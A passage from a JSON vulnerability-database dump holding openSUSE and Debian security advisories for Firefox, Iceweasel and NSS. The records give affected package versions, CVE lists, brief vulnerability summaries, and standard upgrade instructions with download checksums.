"MozillaFirefox-translations-common-24.8.0-127.1.x86_64.rpm", "packageName": "MozillaFirefox-translations-common", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "i586", "packageFilename": "mozilla-nss-3.16.4-94.1.i586.rpm", "packageName": "mozilla-nss", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "24.8.0-127.1", "arch": "i586", "packageFilename": "MozillaFirefox-24.8.0-127.1.i586.rpm", "packageName": "MozillaFirefox", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "24.8.0-127.1", "arch": "i586", "packageFilename": "MozillaFirefox-debuginfo-24.8.0-127.1.i586.rpm", "packageName": "MozillaFirefox-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "x86_64", "packageFilename": "mozilla-nss-32bit-3.16.4-94.1.x86_64.rpm", "packageName": "mozilla-nss-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "i586", "packageFilename": "mozilla-nss-devel-3.16.4-94.1.i586.rpm", "packageName": "mozilla-nss-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "i586", "packageFilename": "mozilla-nss-sysinit-3.16.4-94.1.i586.rpm", "packageName": "mozilla-nss-sysinit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "x86_64", "packageFilename": "mozilla-nss-sysinit-32bit-3.16.4-94.1.x86_64.rpm", "packageName": "mozilla-nss-sysinit-32bit", "operator": "lt"}], "description": "This patch contains security updates for\n\n * mozilla-nss 3.16.4\n - The following 1024-bit root CA certificate was restored to allow more\n time to develop a better transition strategy for affected sites. It\n was removed in NSS 3.16.3, but discussion in the\n mozilla.dev.security.policy forum led to the decision to keep this\n root included longer in order to give website administrators more time\n to update their web servers.\n - CN = GTE CyberTrust Global Root\n * In NSS 3.16.3, the 1024-bit "Entrust.net Secure Server Certification\n Authority" root CA certificate was removed. In NSS 3.16.4, a 2048-bit\n intermediate CA certificate has been included, without explicit trust.\n The intention is to mitigate the effects of the previous removal of\n the 1024-bit Entrust.net root certificate, because many public\n Internet sites still use the "USERTrust Legacy Secure Server CA"\n intermediate certificate that is signed by the 1024-bit Entrust.net\n root certificate. The inclusion of the intermediate certificate is a\n temporary measure to allow those sites to function, by allowing them\n to find a trust path to another 2048-bit root CA certificate. The\n temporarily included intermediate certificate expires November 1, 2015.\n\n * Firefox 31.1esr Firefox is updated from 24esr to 31esr as maintenance\n for version 24 stopped\n\n", "edition": 1, "reporter": "Suse", "published": "2014-09-09T18:04:16", "title": "Firefox update to 31.1esr (important)", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "type": "suse", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1945", "CVE-2011-3648", "CVE-2014-1505", "CVE-2014-1536", "CVE-2011-0061", "CVE-2011-0077", "CVE-2014-1513", "CVE-2012-0478", "CVE-2012-4193", "CVE-2012-0442", "CVE-2013-5601", "CVE-2013-1687", "CVE-2013-5612", "CVE-2013-1692", "CVE-2010-0654", "CVE-2012-1962", "CVE-2013-0743", "CVE-2012-0443", "CVE-2012-5842", "CVE-2012-4212", "CVE-2013-5595", "CVE-2010-0176", "CVE-2014-1530", "CVE-2011-0083", "CVE-2010-1203", "CVE-2013-1737", "CVE-2012-4214", "CVE-2008-1236", "CVE-2013-5611", "CVE-2012-1970", "CVE-2008-3835", "CVE-2013-1709", "CVE-2007-3738", "CVE-2012-3989", "CVE-2013-5616", "CVE-2013-1678", "CVE-2010-2762", "CVE-2012-5830", "CVE-2013-0763", "CVE-2014-1510", "CVE-2011-3026", "CVE-2012-0460", "CVE-2013-5613", "CVE-2012-1973", "CVE-2014-1522", "CVE-2011-3654", "CVE-2014-1567", "CVE-2012-1974", "CVE-2010-2766", "CVE-2012-4195", "CVE-2012-3986", "CVE-2013-0783", "CVE-2007-3734", "CVE-2011-2371", "CVE-2014-1481", "CVE-2013-1670", "CVE-2012-4185", "CVE-2010-3777", "CVE-2012-3991", "CVE-2013-1719", "CVE-2012-3968", "CVE-2013-1725", "CVE-2012-3963", "CVE-2014-1539", "CVE-2010-0174", "CVE-2012-0452", "CVE-2013-1735", "CVE-2012-1956", "CVE-2014-1487", "CVE-2012-3978", "CVE-2012-3985", "CVE-2013-0746", "CVE-2012-5829", "CVE-2009-1571", "CVE-2012-1944", "CVE-2012-5838", "CVE-2011-2986", "CVE-2010-1205", "CVE-2014-1538", "CVE-2012-4213", "CVE-2013-1685", "CVE-2012-0479", "CVE-2013-5609", "CVE-2007-3737", "CVE-2013-0766", "CVE-2007-3736", "CVE-2012-1940", "CVE-2013-1697", "CVE-2014-1484", "CVE-2014-1525", "CVE-2012-3993", "CVE-2013-5619", "CVE-2012-5837", "CVE-2008-5500", "CVE-2012-5836", "CVE-2014-1509", "CVE-2009-0772", "CVE-2013-0787", "CVE-2012-3995", "CVE-2012-4201", "CVE-2010-0159", "CVE-2009-0773", "CVE-2011-3659", "CVE-2011-3663", "CVE-2014-1494", "CVE-2014-1559", "CVE-2013-0747", "CVE-2012-0470", "CVE-2012-0446", "CVE-2008-4063", "CVE-2014-1537", "CVE-2013-1694", "CVE-2014-1523", "CVE-2012-1972", "CVE-2010-1200", "CVE-2010-0175", "CVE-2012-3988", "CVE-2012-0457", "CVE-2010-3778", "CVE-2012-3994", "CVE-2013-5615", "CVE-2013-1680", "CVE-2012-3962", "CVE-2012-0459", "CVE-2011-2362", "CVE-2014-1529", "CVE-2013-1724", "CVE-2010-1213", "CVE-2013-5597", "CVE-2012-5843", "CVE-2014-1543", "CVE-2014-1486", "CVE-2011-0085", "CVE-2013-5590", "CVE-2008-5510", "CVE-2011-0080", "CVE-2013-0780", "CVE-2008-5502", "CVE-2010-3765", "CVE-2013-1732", "CVE-2013-0744", "CVE-2013-0795", "CVE-2008-1237", "CVE-2013-1720", "CVE-2008-4070", "CVE-2013-0748", "CVE-2012-4183", "CVE-2010-3178", "CVE-2013-1679", "CVE-2007-3285", "CVE-2013-5610", "CVE-2013-0768", "CVE-2011-3661", "CVE-2012-4181", "CVE-2014-1532", "CVE-2013-6671", "CVE-2009-0040", "CVE-2011-3652", "CVE-2013-0755", "CVE-2008-4067", "CVE-2014-1548", "CVE-2011-2364", "CVE-2014-1531", "CVE-2013-0752", "CVE-2012-4186", "CVE-2014-1508", "CVE-2012-1948", "CVE-2008-5012", "CVE-2012-1938", "CVE-2013-0796", "CVE-2012-0449", "CVE-2010-3769", "CVE-2012-3969", "CVE-2014-1502", "CVE-2013-1723", "CVE-2013-0782", "CVE-2012-1953", "CVE-2012-1949", "CVE-2014-1542", "CVE-2012-0456", "CVE-2011-2372", "CVE-2010-3169", "CVE-2012-3970", "CVE-2011-0053", "CVE-2012-5840", "CVE-2010-3176", "CVE-2012-4191", "CVE-2010-3174", "CVE-2010-3768", "CVE-2014-1477", "CVE-2013-0800", "CVE-2010-1212", "CVE-2013-1681", "CVE-2010-1211", "CVE-2010-1121", "CVE-2013-0773", "CVE-2013-0754", "CVE-2010-3167", "CVE-2012-4202", "CVE-2010-3180", "CVE-2012-3957", "CVE-2011-3660", "CVE-2014-1540", "CVE-2014-1534", "CVE-2012-1941", "CVE-2013-1738", "CVE-2014-1482", "CVE-2014-1479", "CVE-2008-4066", "CVE-2008-5018", "CVE-2012-3984", "CVE-2014-1504", "CVE-2012-0444", "CVE-2011-3650", "CVE-2014-1511", "CVE-2010-2753", "CVE-2012-1946", "CVE-2010-3776", "CVE-2012-4182", "CVE-2008-1233", "CVE-2012-4187", "CVE-2012-3983", "CVE-2011-0062", "CVE-2008-0016", "CVE-2011-3101", "CVE-2010-3168", "CVE-2013-0788", "CVE-2013-1728", "CVE-2014-1545", "CVE-2010-0173", "CVE-2012-0472", "CVE-2013-5592", "CVE-2013-1730", "CVE-2008-4059", "CVE-2010-2764", "CVE-2014-1492", "CVE-2011-0081", "CVE-2009-0771", "CVE-2007-3670", "CVE-2012-1954", "CVE-2009-0774", "CVE-2014-1556", "CVE-2012-0461", "CVE-2011-2376", "CVE-2012-3958", "CVE-2012-0469", "CVE-2014-1563", "CVE-2014-1524", "CVE-2014-1512", "CVE-2012-1975", "CVE-2011-0075", "CVE-2013-1690", "CVE-2012-0464", "CVE-2013-0775", "CVE-2012-1967", "CVE-2013-5604", "CVE-2014-1514", "CVE-2010-3166", "CVE-2011-0074", "CVE-2013-0801", "CVE-2012-3956", "CVE-2010-2769", "CVE-2012-3982", "CVE-2009-3555", "CVE-2013-1714", "CVE-2011-2989", "CVE-2010-1196", "CVE-2008-5021", "CVE-2008-5017", "CVE-2013-0769", "CVE-2012-3966", "CVE-2013-0771", "CVE-2014-1490", "CVE-2012-5839", "CVE-2013-0757", "CVE-2014-1498", "CVE-2012-1961", "CVE-2010-3173", "CVE-2012-4216", "CVE-2008-4062", "CVE-2010-3179", "CVE-2010-0182", "CVE-2014-1565", "CVE-2012-3967", "CVE-2013-0749", "CVE-2011-3651", "CVE-2008-4060", "CVE-2007-3656", "CVE-2008-1234", "CVE-2012-1951", "CVE-2012-0475", "CVE-2014-1555", "CVE-2014-1564", "CVE-2012-1952", "CVE-2010-1201", "CVE-2013-0761", "CVE-2013-1669", "CVE-2010-1585", "CVE-2012-3959", "CVE-2012-0455", "CVE-2014-1558", "CVE-2011-0084", "CVE-2012-0759", "CVE-2007-3089", "CVE-2014-1519", "CVE-2013-1701", "CVE-2012-0474", "CVE-2012-3975", "CVE-2010-2768", "CVE-2008-5014", "CVE-2013-1684", "CVE-2008-4058", "CVE-2012-4184", "CVE-2012-0447", "CVE-2014-1547", "CVE-2011-3232", "CVE-2012-4205", "CVE-2014-1480", "CVE-2014-1500", "CVE-2011-0069", "CVE-2013-6630", "CVE-2008-5022", "CVE-2008-5512", "CVE-2014-1497", "CVE-2013-5596", "CVE-2012-3992", "CVE-2008-1235", "CVE-2013-1676", "CVE-2013-0789", "CVE-2008-5501", "CVE-2008-4068", "CVE-2008-5016", "CVE-2013-1675", "CVE-2014-1478", "CVE-2012-3980", "CVE-2008-5503", "CVE-2011-2374", "CVE-2012-1955", "CVE-2012-1960", "CVE-2012-0445", "CVE-2012-0462", "CVE-2012-4217", "CVE-2013-1686", "CVE-2013-0745", "CVE-2013-0756", "CVE-2012-4218", "CVE-2013-0760", "CVE-2011-2377", "CVE-2014-1485", "CVE-2014-1493", "CVE-2007-3735", "CVE-2011-3000", "CVE-2010-2765", "CVE-2014-1544", "CVE-2010-2767", "CVE-2011-0078", "CVE-2012-3960", "CVE-2010-3175", "CVE-2012-0451", "CVE-2011-3655", "CVE-2012-4180", "CVE-2013-0767", "CVE-2010-3182", "CVE-2009-0776", "CVE-2013-5603", "CVE-2012-1959", "CVE-2011-2363", "CVE-2011-0070", "CVE-2013-1682", "CVE-2012-1947", "CVE-2013-6673", "CVE-2013-1674", "CVE-2013-0762", "CVE-2014-1562", "CVE-2010-3170", "CVE-2011-3005", "CVE-2012-4208", "CVE-2011-3658", "CVE-2014-1541", "CVE-2011-2373", "CVE-2008-5511", "CVE-2011-2992", "CVE-2014-1488", "CVE-2012-1957", "CVE-2012-1958", "CVE-2008-4064", "CVE-2012-1976", "CVE-2011-1187", "CVE-2012-5835", "CVE-2014-1552", "CVE-2010-3183", "CVE-2010-1202", "CVE-2012-0468", "CVE-2013-5599", "CVE-2014-1553", "CVE-2014-1549", "CVE-2013-1713", "CVE-2008-5508", "CVE-2012-3972", "CVE-2012-4207", "CVE-2011-2988", "CVE-2008-4061", "CVE-2013-5591", "CVE-2010-1199", "CVE-2012-4204", "CVE-2013-5602", "CVE-2011-2985", "CVE-2012-4192", "CVE-2011-2987", "CVE-2012-4188", "CVE-2012-0441", "CVE-2013-0774", "CVE-2008-5024", "CVE-2013-0753", "CVE-2012-5833", "CVE-2014-1557", "CVE-2013-1736", "CVE-2014-1526", "CVE-2013-0776", "CVE-2012-3964", "CVE-2013-5593", "CVE-2014-1550", "CVE-2013-1718", "CVE-2012-5841", "CVE-2014-1533", "CVE-2013-1717", "CVE-2010-2754", "CVE-2008-5507", "CVE-2012-3990", "CVE-2014-1491", "CVE-2013-6672", "CVE-2013-5614", "CVE-2008-4065", "CVE-2013-1693", "CVE-2010-2760", "CVE-2013-0750", "CVE-2012-1937", "CVE-2014-1560", "CVE-2012-4215", "CVE-2013-6629", "CVE-2012-0463", "CVE-2013-1677", "CVE-2011-2991", "CVE-2013-0770", "CVE-2013-0793", "CVE-2012-4179", "CVE-2011-3001", "CVE-2014-1483", "CVE-2014-1489", "CVE-2011-3062", "CVE-2012-0477", "CVE-2013-1722", "CVE-2012-0473", "CVE-2012-4194", "CVE-2011-2365", "CVE-2012-4209", "CVE-2012-1963", "CVE-2012-4196", "CVE-2008-5506", "CVE-2013-1710", "CVE-2012-0467", "CVE-2012-0458", "CVE-2013-0758", "CVE-2013-5600", "CVE-2010-2752", "CVE-2014-1499", "CVE-2014-1518", "CVE-2012-0471", "CVE-2012-3961", "CVE-2014-1561", "CVE-2012-3971", "CVE-2013-0764", "CVE-2014-1528", "CVE-2013-5618", "CVE-2011-0072"], "modified": "2014-09-09T18:04:16", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00004.html", "id": "OPENSUSE-SU-2014:1100-1", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2018-10-16T22:14:52", "references": [], "affectedPackage": [{"OS": "Debian", "OSVersion": "4", "packageVersion": "2.0.0.17-0etch1", "arch": "all", "packageFilename": "iceweasel-dom-inspector_2.0.0.17-0etch1_all.deb", "packageName": "iceweasel-dom-inspector", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "2.0.0.17-0etch1", "arch": "all", "packageFilename": "mozilla-firefox-dom-inspector_2.0.0.17-0etch1_all.deb", "packageName": "mozilla-firefox-dom-inspector", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "2.0.0.17-0etch1", "arch": "all", "packageFilename": "mozilla-firefox-gnome-support_2.0.0.17-0etch1_all.deb", "packageName": "mozilla-firefox-gnome-support", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "2.0.0.17-0etch1", "arch": "all", "packageFilename": "firefox-gnome-support_2.0.0.17-0etch1_all.deb", "packageName": "firefox-gnome-support", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "2.0.0.17-0etch1", "arch": "all", "packageFilename": "firefox_2.0.0.17-0etch1_all.deb", "packageName": "firefox", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "2.0.0.17-0etch1", "arch": "all", "packageFilename": "mozilla-firefox_2.0.0.17-0etch1_all.deb", "packageName": "mozilla-firefox", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "2.0.0.17-0etch1", "arch": "all", "packageFilename": "iceweasel-dbg_2.0.0.17-0etch1_all.deb", "packageName": "iceweasel-dbg", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "2.0.0.17-0etch1", "arch": "all", "packageFilename": "iceweasel-gnome-support_2.0.0.17-0etch1_all.deb", "packageName": "iceweasel-gnome-support", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "2.0.0.17-0etch1", "arch": "all", "packageFilename": "firefox-dom-inspector_2.0.0.17-0etch1_all.deb", "packageName": "firefox-dom-inspector", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "2.0.0.17-0etch1", "arch": "all", "packageFilename": "iceweasel_2.0.0.17-0etch1_all.deb", "packageName": "iceweasel", "operator": "lt"}], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1649-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nOctober 08, 2008 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : iceweasel\nVulnerability : several\nProblem-Type : remote\nDebian-specific: no\nCVE ID : CVE-2008-0016 CVE-2008-3835 CVE-2008-3836 CVE-2008-3837 CVE-2008-4058 CVE-2008-4059 CVE-2008-4060 CVE-2008-4061 CVE-2008-4062 CVE-2008-4065 CVE-2008-4066 CVE-2008-4067 CVE-2008-4068 CVE-2008-4069\n\nSeveral remote vulnerabilities have been discovered in the Iceweasel web\nbrowser, an unbranded version of the Firefox browser. The Common\nVulnerabilities and Exposures project identifies the following problems:\n \nCVE-2008-0016\n\n Justin Schuh, Tom Cross and Peter Williams discovered a buffer\n overflow in the parser for UTF-8 URLs, which may lead to the\n execution of arbitrary code.\n\nCVE-2008-3835\n\n "moz_bug_r_a4" discovered that the same-origin check in\n nsXMLDocument::OnChannelRedirect() could by bypassed.\n\nCVE-2008-3836\n\n "moz_bug_r_a4" discovered that several vulnerabilities in\n feedWriter could lead to Chrome privilege escalation.\n\nCVE-2008-3837\n\n Paul Nickerson discovered that an attacker could move windows\n during a mouse click, resulting in unwanted action triggered by\n drag-and-drop.\n\nCVE-2008-4058\n\n "moz_bug_r_a4" discovered a vulnerability which can result in\n Chrome privilege escalation through XPCNativeWrappers.\n\nCVE-2008-4059\n\n "moz_bug_r_a4" discovered a vulnerability which can result in\n Chrome privilege escalation through XPCNativeWrappers.\n\nCVE-2008-4060\n\n Olli Pettay and "moz_bug_r_a4" discovered a Chrome privilege\n escalation vulnerability in XSLT handling.\n\nCVE-2008-4061\n\n Jesse Ruderman discovered a crash in the layout engine, which might\n allow the execution of arbitrary code.\n\nCVE-2008-4062\n\n Igor Bukanov, Philip Taylor, Georgi Guninski and Antoine Labour\n discovered crashes in the Javascript engine, which might allow the\n execution of arbitrary code.\n\nCVE-2008-4065\n\n Dave Reed discovered that some Unicode byte order marks are\n stripped from Javascript code before execution, which can result in\n code being executed, which were otherwise part of a quoted string.\n\nCVE-2008-4066\n\n Gareth Heyes discovered that some Unicode surrogate characters are\n ignored by the HTML parser.\n\nCVE-2008-4067\n\n Boris Zbarsky discovered that resource: URls allow directory\n traversal when using URL-encoded slashes.\n\nCVE-2008-4068\n\n Georgi Guninski discovered that resource: URLs could bypass local\n access restrictions.\n\nCVE-2008-4069\n\n Billy Hoffman discovered that the XBM decoder could reveal\n uninitialised memory.\n\nFor the stable distribution (etch), these problems have been fixed in\nversion 2.0.0.17-0etch1. Packages for hppa will be provided later.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 3.0.3 of iceweasel and 1.9.0.3-1 of xulrunner.\n\nWe recommend that you upgrade your iceweasel package.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nStable updates are available for alpha, amd64, arm, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel_2.0.0.17.orig.tar.gz\n Size/MD5 checksum: 47264462 caa85228cc0f4d309e85d6991cb95305\n http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel_2.0.0.17-0etch1.dsc\n Size/MD5 checksum: 1289 84dfa301f786f84a1d64baf4ed3db782\n http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel_2.0.0.17-0etch1.diff.gz\n Size/MD5 checksum: 186694 8e6e9a55fde52af390122189070fca57\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/i/iceweasel/firefox_2.0.0.17-0etch1_all.deb\n Size/MD5 checksum: 54634 b2fd3414c31cebfcf9a1433dcc1d2e93\n http://security.debian.org/pool/updates/main/i/iceweasel/firefox-dom-inspector_2.0.0.17-0etch1_all.deb\n Size/MD5 checksum: 54530 fc5fb66d2eaf4027d945dd0a28b2d846\n http://security.debian.org/pool/updates/main/i/iceweasel/mozilla-firefox-dom-inspector_2.0.0.17-0etch1_all.deb\n Size/MD5 checksum: 54384 21762949b8e2fd39ac79476fa24b03d1\n http://security.debian.org/pool/updates/main/i/iceweasel/mozilla-firefox-gnome-support_2.0.0.17-0etch1_all.deb\n Size/MD5 checksum: 54384 9df9c09b5351c290fee72c24b47a331d\n http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel-dom-inspector_2.0.0.17-0etch1_all.deb\n Size/MD5 checksum: 239720 644c28cc69b5ffa408b0c57b92152ec3\n http://security.debian.org/pool/updates/main/i/iceweasel/mozilla-firefox_2.0.0.17-0etch1_all.deb\n Size/MD5 checksum: 55170 5d191251cab8743fdd8537c757e39abc\n http://security.debian.org/pool/updates/main/i/iceweasel/firefox-gnome-support_2.0.0.17-0etch1_all.deb\n Size/MD5 checksum: 54494 bf8060f4a48856e3221988210417ebd6\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel_2.0.0.17-0etch1_alpha.deb\n Size/MD5 checksum: 11578586 a8c71f32151faca4674a1a09e3b66545\n http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel-dbg_2.0.0.17-0etch1_alpha.deb\n Size/MD5 checksum: 51173558 6361a1e6926eb32d5ede6c74671d86f1\n http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel-gnome-support_2.0.0.17-0etch1_alpha.deb\n Size/MD5 checksum: 90252 569480998f4eac60ba8c0f6e62cb275e\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel-gnome-support_2.0.0.17-0etch1_amd64.deb\n Size/MD5 checksum: 87924 70015d9a4e458e26ff6b65a2674ff56a\n http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel_2.0.0.17-0etch1_amd64.deb\n Size/MD5 checksum: 10206146 ec62c84f919bda242b9d65390d9143be\n http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel-dbg_2.0.0.17-0etch1_amd64.deb\n Size/MD5 checksum: 50165526 8b083d926eb7e6da63c0be882af1642f\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel-dbg_2.0.0.17-0etch1_arm.deb\n Size/MD5 checksum: 49257448 89f6c8c0b51255038eee5d13416fcadb\n http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel-gnome-support_2.0.0.17-0etch1_arm.deb\n Size/MD5 checksum: 81618 59dba0eee92b991d069f883c19680d75\n http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel_2.0.0.17-0etch1_arm.deb\n Size/MD5 checksum: 9256358 4fd0774c50d76457152d406ed19ea367\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel-dbg_2.0.0.17-0etch1_i386.deb\n Size/MD5 checksum: 49570130 6a6b0cb233e73d4baef8ddbd33029b98\n http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel-gnome-support_2.0.0.17-0etch1_i386.deb\n Size/MD5 checksum: 82056 91a67db26a7c51ae185d39dedaaf94cb\n http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel_2.0.0.17-0etch1_i386.deb\n Size/MD5 checksum: 9122164 5b4e1dfeb171be9542572fc9e490b818\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel_2.0.0.17-0etch1_ia64.deb\n Size/MD5 checksum: 14156490 2607bd2156b38eebeb2ecdde49acea53\n http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel-gnome-support_2.0.0.17-0etch1_ia64.deb\n Size/MD5 checksum: 100252 1e28dda1215d01e2cfe35403a52a0fcc\n http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel-dbg_2.0.0.17-0etch1_ia64.deb\n Size/MD5 checksum: 50513628 0db2edd5ef28c04f8c1d5331e92e100d\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel_2.0.0.17-0etch1_mips.deb\n Size/MD5 checksum: 11063822 d78bb2a163ec303a618ea88e005f0116\n http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel-gnome-support_2.0.0.17-0etch1_mips.deb\n Size/MD5 checksum: 83196 ef3e17948ca57bebb18890d5ce89e0f8\n http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel-dbg_2.0.0.17-0etch1_mips.deb\n Size/MD5 checksum: 53969964 f42e61e36c60c76b24e1bf34600479da\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel-gnome-support_2.0.0.17-0etch1_mipsel.deb\n Size/MD5 checksum: 83224 be3cb4e303ad8544dd274447451228c6\n http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel_2.0.0.17-0etch1_mipsel.deb\n Size/MD5 checksum: 10761380 077af6ef650d85ed023acb5d936318c3\n http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel-dbg_2.0.0.17-0etch1_mipsel.deb\n Size/MD5 checksum: 52518328 de36b16feb4052325ed975d9d75a6625\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel_2.0.0.17-0etch1_powerpc.deb\n Size/MD5 checksum: 9937490 9ef7bdd022ec317efaefbfcd5e0b0aa0\n http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel-dbg_2.0.0.17-0etch1_powerpc.deb\n Size/MD5 checksum: 51973444 ee5cb6165d1cda06c158df93f393b833\n http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel-gnome-support_2.0.0.17-0etch1_powerpc.deb\n Size/MD5 checksum: 83786 56ad8684dc229e605f7285e48bb10389\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel_2.0.0.17-0etch1_s390.deb\n Size/MD5 checksum: 10366602 06f0cc6f4fab228756f7b088eee305d3\n http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel-dbg_2.0.0.17-0etch1_s390.deb\n Size/MD5 checksum: 50839114 fa42c55974b0beece5184341e5ca4340\n http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel-gnome-support_2.0.0.17-0etch1_s390.deb\n Size/MD5 checksum: 88198 6ebd745cc96c2c6c80cb7f2987138364\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel-dbg_2.0.0.17-0etch1_sparc.deb\n Size/MD5 checksum: 49179416 00c2781b99157e0f0970b01d1d2e70ed\n http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel-gnome-support_2.0.0.17-0etch1_sparc.deb\n Size/MD5 checksum: 82000 e74866cfbd6a70b1e7e7b5eb737dc8a8\n http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel_2.0.0.17-0etch1_sparc.deb\n Size/MD5 checksum: 9199076 95cacd55b0dc6415d62f30394517048a\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 1, "reporter": "Debian", "published": "2008-10-08T20:16:14", "title": "[SECURITY] [DSA 1649-1] New iceweasel packages fix several vulnerabilities", "type": "debian", "enchantments": {"score": {"modified": "2018-10-16T22:14:52", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2008-3835", "CVE-2008-4067", "CVE-2008-3836", "CVE-2008-4066", "CVE-2008-4069", "CVE-2008-0016", "CVE-2008-4059", "CVE-2008-3837", "CVE-2008-4062", "CVE-2008-4060", "CVE-2008-4058", "CVE-2008-4068", "CVE-2008-4061", "CVE-2008-4065"], "modified": "2008-10-08T20:16:14", "id": "DEBIAN:DSA-1649-1:279A7", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2008/msg00240.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-16T22:13:59", "references": [], "affectedPackage": [{"OS": "Debian", "OSVersion": "4", "packageVersion": "1.8.0.15~pre080614h-0etch1", "arch": "all", "packageFilename": "libxul-dev_1.8.0.15~pre080614h-0etch1_all.deb", "packageName": "libxul-dev", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "1.8.0.15~pre080614h-0etch1", "arch": "all", "packageFilename": "libnss3-0d-dbg_1.8.0.15~pre080614h-0etch1_all.deb", "packageName": "libnss3-0d-dbg", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "1.8.0.15~pre080614h-0etch1", "arch": "all", "packageFilename": "libsmjs-dev_1.8.0.15~pre080614h-0etch1_all.deb", "packageName": "libsmjs-dev", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "1.8.0.15~pre080614h-0etch1", "arch": "all", "packageFilename": "xulrunner-gnome-support_1.8.0.15~pre080614h-0etch1_all.deb", "packageName": "xulrunner-gnome-support", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "1.8.0.15~pre080614h-0etch1", "arch": "all", "packageFilename": "python-xpcom_1.8.0.15~pre080614h-0etch1_all.deb", "packageName": "python-xpcom", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "1.8.0.15~pre080614h-0etch1", "arch": "all", 